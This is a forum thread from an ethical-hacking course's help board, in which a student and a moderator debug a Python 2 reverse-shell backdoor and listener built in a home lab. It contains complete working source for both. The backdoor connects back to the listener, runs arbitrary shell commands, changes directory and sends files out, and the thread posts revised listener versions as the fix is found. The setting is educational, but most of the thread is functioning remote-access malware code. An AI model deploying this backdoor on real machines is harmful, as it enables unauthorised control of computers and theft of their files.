Viewing 15 posts - 1 through 15 (of 15 total)
  • #38060
    cybersamuraiDK
    Participant

    So I am following the course: Learn Python & Ethical Hacking From Scratch with Zaid.

    And I am in the section where we set up a backdoor on our Windows machine, and a listener in Kali Linux.

    I have followed Zaid's video 100% and this is the listener code:

    #!/usr/bin/env python

    import socket
    import json

    class Listener:
    def __init__(self, ip, port):
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((ip, port))
    listener.listen(0)
    print(“[+] Waiting for incoming connections”)
    self.connection, address = listener.accept()
    print(“[+] Got a connection from ” + str(address))

    def reliable_send(self, data):
    json_data = json.dumps(data)
    self.connection.send(json_data)

    def reliable_receive(self):
    json_data = “”
    while True:
    try:
    json_data = json_data + self.connection.recv(1024)
    return json.loads(json_data)
    except ValueError:
    continue

    def execute_remotely(self, command):
    self.reliable_send(command)
    if command[0] == “exit”:
    self.connection.close()
    exit()

    return self.reliable_receive

    def write_file(self, path, content):
    with open(path, “wb”) as file:
    file.write(content)
    return “[+] Download successful.”

    def run(self):
    while True:
    command = raw_input(“>> “)
    command = command.split(” “)
    result = self.execute_remotely(command)
    if command[0] == “download”:
    result = self.write_file(command[1], result)

    print(result())

    my_listener = Listener(“10.0.2.10”, 4444)
    my_listener.run()

    ————————————————————————————————————————————–

    I had to rework **print(result())**

    Otherwise it looked like this when doing system commands:

    [+] Got a connection from (‘10.0.2.15’, 49848)
    >> dir
    **<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f7aa7776190>>**

    But now when I try to download a sample.txt from my Windows machine I get this error:

    [+] Got a connection from ('10.0.2.15', 49846)
    >> download sample.txt
    Traceback (most recent call last):
    File "listener.py", line 55, in <module>
    my_listener.run()
    File "listener.py", line 49, in run
    result = self.write_file(command[1], result)
    File "listener.py", line 40, in write_file
    file.write(content)
    TypeError: argument 1 must be string or buffer, not instancemethod

    I am stuck at this point until I can make it work! Have been spending days trying to figure it out 🙁 Please help

    #38092
    Diego Pérez
    Moderator

    Hi CyberSamurai!
    It looks like the error may be in the backdoor code.
    Can you share it please? Also it would be better to share it including indentation, because it's difficult to read it this way.

    Thanks!
    Diego

    #38116
    cybersamuraiDK
    Participant

    Yes sir 🙂

    This is the backdoor code running on my Windows 10 machine.

    #!/usr/bin/env python
    
    import socket 
    import subprocess
    import json
    import os
    
    class Backdoor:
    	def __init__(self, ip, port):
    		self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    		self.connection.connect((ip, port))
    
    	def reliable_send(self, data):
    		json_data = json.dumps(data)
    		self.connection.send(json_data)
    
    	def reliable_receive(self):
    		json_data = ""
    		while True:
    			try:
    			    json_data = self.connection.recv(1024)
    		            return json.loads(json_data)
    			except ValueError:
    			    continue		
    	
    	def execute_system_command(self, command):
    		return subprocess.check_output(command, shell=True)
    
    	def change_working_directory_to(self, path):
    		os.chdir(path)
    		return "[+] Changing CD to " + path	
    		
    
    	def read_file(self, path):
    		with open(path, "rb") as file:
    			return file.read()  	
    
    	def run(self):
    		while True:
    	            command = self.reliable_receive()
    		    if command[0] == "exit":
    			 self.connection.close()
    			 exit()
    		    elif command[0] == "cd" and len(command) > 1:
    			command_result = self.change_working_directory_to(command[1])
    		    elif command[0] == "download":
    			command_result = self.read_file(command[1])
    		    else:
    			command_result = self.execute_system_command(command)
    		    self.reliable_send(command_result)
    		
    my_backdoor = Backdoor("10.0.2.10", 4444)
    my_backdoor.run()
    #38223
    Diego Pérez
    Moderator

    Hi!
    Thanks!

    Following both pieces of code, it turns out you have this line at the bottom of your listener:

    print(result())

    Please remove the parentheses from result, like this: print(result)

    Let me know how it goes!
    Diego

    #38243
    cybersamuraiDK
    Participant

    When I remove the () from print(result()), all terminal commands are like this:

    root@kali:~/PycharmProjects/Malware/Backdoor# python listener.py
    [+] Waiting for incoming connections
    [+] Got a connection from (‘10.0.2.15’, 49834)
    >> dir
    <bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f1b331b90f0>>
    >>

    #38314
    Diego Pérez
    Moderator

    Hi! That's weird, because calling result() is like calling a function and not a variable.
    Can you share the listener again but with indentation please?
    Also can you add a print in the reliable_receive function just before the return:
    print(json.loads(json_data))

    Let me know.
    Diego

    #38318
    cybersamuraiDK
    Participant

    This is the code 🙂 Thank you for helping me out, I am a little bit stuck, can't go any further in the course.

    Forgot something, will add more in a moment.

    #38323
    cybersamuraiDK
    Participant

    Thank you for helping me out 🙂

    I still get the same:

    ————————————————————————————————
    [+] Waiting for incoming connections
    [+] Got a connection from (‘10.0.2.15’, 49707)
    >> dir
    <bound method Listener.reliable_receive of <__main__.Listener instance at 0x7fa8d4aa5190>>
    >>

    ————————————————————————————————

    #!/usr/bin/env python
    
    import socket
    import json
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    print(json.loads(json_data))
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                exit()
    
            return self.reliable_receive
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(content)
                return "[+] Download successful."
    
        def run(self):
            while True:
                command = raw_input(">> ")
                command = command.split(" ")
                result = self.execute_remotely(command)
    
                if command[0] == "download":
                    result = self.write_file(command[1], result)
    
                print(result)
    
    my_listener = Listener("10.0.2.10", 4444)
    my_listener.run()
    
    #38324
    cybersamuraiDK
    Participant

    The really strange thing is that if I write the code like this:

    #!/usr/bin/env python
    
    import socket
    import json
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data)
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024)
                    print(json.loads(json_data))
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command)
            if command[0] == "exit":
                self.connection.close()
                exit()
    
            return self.reliable_receive
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(content)
                return "[+] Download successful."
    
        def run(self):
            while True:
                command = raw_input(">> ")
                command = command.split(" ")
                result = self.execute_remotely(command)
    
                if command[0] == "download":
                    result = self.write_file(command[1], result())
    
                    print(result())
    
    my_listener = Listener("10.0.2.10", 4444)
    my_listener.run()

    I end up with this result, when trying to use “download sample.txt”:

    >> download sample.txt
    Traceback (most recent call last):
    File "temp.py", line 57, in <module>
    my_listener.run()
    File "temp.py", line 53, in run
    print(result())
    TypeError: 'str' object is not callable

    #38441
    Diego Pérez
    Moderator

    Hi!
    Yeah, this last issue makes more sense. It happens because () makes Python think it is a function when it is a string; that's why the error says that a string cannot be callable.
    Will test your code and let you know.

    Are you using python2 or 3 to run the code?

    Greetings!
    Diego

    #38443
    cybersamuraiDK
    Participant

    I am using Python 2 🙂 just like Zaid in the course.

    #38528
    Diego Pérez
    Moderator

    Hi!
    Ok! I haven’t had time to test your code yet, will come back as soon as I do it.

    Greetings!
    Diego

    #38799
    Diego Pérez
    Moderator

    Hi!
    Sorry to reply only now, but I haven't had much time to test your code.
    Now I did it and found the error: in the line "return self.reliable_receive" in execute_remotely you are missing the parentheses. It should be like this:
    return self.reliable_receive()
    This will make it work.

    Greetings!
    Diego
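
The three symptoms seen in this thread, traced to the single missing call, as an added example that is not part of the original posts. It is written for Python 3 (the thread uses Python 2), and the `Channel` class, the `symptoms` function and the sample bytes are constructed stand-ins with no networking.

```python
import io


class Channel:
    """Constructed stand-in for the thread's Listener (no sockets)."""

    def __init__(self, reply):
        self._reply = reply

    def reliable_receive(self):
        return self._reply

    def execute_buggy(self):
        # As posted: hands back the bound method instead of calling it.
        return self.reliable_receive

    def execute_fixed(self):
        # The accepted fix: call the method and return its result.
        return self.reliable_receive()


def write_file(handle, content):
    handle.write(content)  # a binary handle rejects anything but bytes
    return "[+] Download successful."


def symptoms(reply=b"constructed sample.txt contents"):
    chan, seen = Channel(reply), {}
    result = chan.execute_buggy()
    seen["printed"] = str(result)      # symptom 1: "<bound method ...>"
    seen["workaround"] = result()      # print(result()) only masks the bug
    try:                               # symptom 2: download path fails
        write_file(io.BytesIO(), result)
    except TypeError as exc:
        seen["download"] = type(exc).__name__
    status = write_file(io.BytesIO(), result())
    try:                               # symptom 3: status string gets called
        status()
    except TypeError as exc:
        seen["second_try"] = str(exc)
    seen["fixed"] = chan.execute_fixed()
    return seen


if __name__ == "__main__":
    for key, value in symptoms().items():
        print(key, "->", value)
```

Fixing the return statement in one place removes the need to decide, at every use of `result`, whether it is a value or a callable.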

    #38824
    cybersamuraiDK
    Participant

    Diego 🙂 I want to thank you with all my heart! It freakin works! 😀 😀

    You don't know how many hours/days I have used to try and solve this. I am taking an exam today about cybersec, and this was going to be my masterpiece 🙂 so you could imagine HOW MUCH I was sweating and biting nails because I couldn't get it to work.

    Thank you 🙂 MY presentation is saved!

    #38920
    Diego Pérez
    Moderator

    Hi!

    Cool you got it! Glad to help!
    Diego
